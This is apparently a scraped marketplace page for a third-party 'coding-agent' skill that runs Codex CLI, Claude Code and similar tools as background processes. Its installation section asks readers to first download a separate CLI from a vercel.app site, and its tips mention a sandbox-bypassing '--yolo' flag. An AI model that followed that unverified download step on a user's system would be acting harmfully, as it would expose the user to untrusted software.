coding-agent
Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.
Why use this skill?
Integrate Codex CLI and Claude Code into OpenClaw. Automate PR reviews, code generation, and project scaffolding with background-first execution.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/thiagoruss0/coding-agentagb2What This Skill Does
The coding-agent skill is a powerful automation bridge that connects the OpenClaw agent to professional-grade coding interfaces like Codex CLI, Claude Code, and OpenCode. It allows the agent to execute complex programming tasks, perform code reviews, and scaffold projects in the background. By utilizing a workdir-centric architecture, the skill ensures that AI agents operate within isolated file system boundaries, preventing unwanted cross-contamination of project files.
Installation
To enable this skill, first install the OpenClawCLI from openclawcli.vercel.app. Once the CLI is present on your system, run the installation command inside your terminal: clawhub install openclaw/skills/skills/thiagoruss0/coding-agentagb2. Ensure you have the necessary environment permissions to execute background processes and manage directories.
Use Cases
This skill is designed for developers who need to offload time-consuming tasks. Common use cases include:
- Automated Scaffold Creation: Quickly generating boilerplate code or game prototypes using the
--full-autoflag. - PR Auditing: Performing deep-dive code reviews by isolating PR branches in temporary worktrees or directories, keeping your main development environment clean.
- Background Refactoring: Running legacy code modernization tasks in the background while continuing other work in the main terminal.
- Batch Processing: Managing multiple concurrent code reviews or analysis tasks via parallel background processes.
Example Prompts
- "Use the coding-agent to scaffold a new React project in a temp directory with a dark-themed snake game implementation using --full-auto mode."
- "Review the current pull request in this repository using codex, ensuring you isolate the review to a separate worktree to avoid conflicts."
- "Run a background analysis on the files in ~/src/auth/ and suggest performance optimizations for the login logic using the coding-agent."
Tips & Limitations
- Safety First: Always use the
--yoloflag with extreme caution; it bypasses all safety sandboxing. Prefer--full-autofor standard tasks. - Context Control: Always define a explicit
workdirto prevent the agent from reading unrelated configuration or secret files in your home directory. - Cleanup: If you clone repositories or create temporary directories for reviews, remember to clean them up after the agent reports success to keep your disk space optimized.
- Execution Mode: Use
tmuxfor interactive debugging where you need to watch output in real-time, and reservebackground:truefor fire-and-forget tasks.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-thiagoruss0-coding-agentagb2": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: file-write, file-read, code-execution
Related Skills
n8n
Manage n8n workflows and automations via API. Use when working with n8n workflows, executions, or automation tasks - listing workflows, activating/deactivating, checking execution status, manually triggering workflows, or debugging automation issues.
Read WeChat local data from SQLite databases. Supports listing contacts, chat sessions, searching messages, and viewing favorites. Use when the user needs to access their own WeChat data stored locally. Requires access to WeChat data directory. Read-only operations only.
coding-agent
Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.
veo3-gen
Generate and stitch short videos via Google Veo 3.x using the Gemini API (google-genai). Use when you need to create video clips from prompts (ads, UGC-style clips, product demos) and want a reproducible CLI workflow (generate, poll, download MP4, optionally stitch multiple segments).
jira
Jira API integration with managed OAuth. Search issues with JQL, create and update issues, manage projects and transitions. Use this skill when users want to interact with Jira issues, projects, or workflows. For other third party apps, use the api-gateway skill (https://clawhub.ai/byungkyu/api-gateway).